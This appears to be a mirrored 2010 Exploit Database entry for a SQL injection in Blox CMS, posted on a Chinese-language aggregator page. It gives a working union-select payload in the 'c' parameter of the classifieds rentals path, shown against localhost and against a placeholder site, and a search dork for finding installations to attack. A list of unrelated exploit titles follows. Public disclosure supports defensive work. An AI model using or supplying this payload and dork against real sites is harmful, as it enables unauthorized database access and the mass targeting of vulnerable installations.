Blox CMS – SQL Injection

Exploit Database
12 阅读

作者： CoBRa_21

日期： 2010-05-24
类别：
- webapps
平台：
- php
来源：https://www.exploit-db.com/exploits/12729/

-------------------------------------------------------------------------------------------

Blox CMS SQL Injection Vulnerability

-------------------------------------------------------------------------------------------

Author: CoBRa_21

Script Home: http://bloxcms.com/

Dork: Powered by Blox CMS from TownNews.com

-------------------------------------------------------------------------------------------

Sql Injection:

http://localhost/[path]/app/classifieds/rentals/?c=-156%20union%20select%200,1,2,3,4,version%28%29,6,7,8,9,10,11,12,13,14,15


Demo :

http://www.site.com/app/classifieds/rentals/?c=-156%20union%20select%200,1,2,3,4,version%28%29,6,7,8,9,10,11,12,13,14,15

-------------------------------------------------------------------------------------------

last Exploits
Blox CMS – SQL Injection的更多信息

Online Discussion Forum Site 1.0 – Remote Code Execution：
CISCO Small Business 200 / 300 / 500 Switches – Multiple Vulnerabilities：
HoloCMS 9.0.47 – ‘news.php’ SQL Injection：
Guru Auction 2.0 – Multiple SQL Injections：
Redatam Web Server < 7 - Directory Traversal：
iscripts Socialware 2.2.x – Multiple Vulnerabilities：
File Upload Manager 1.3 – Web Shell File Upload：
AneCMS 1.0 – Multiple Local File Inclusions：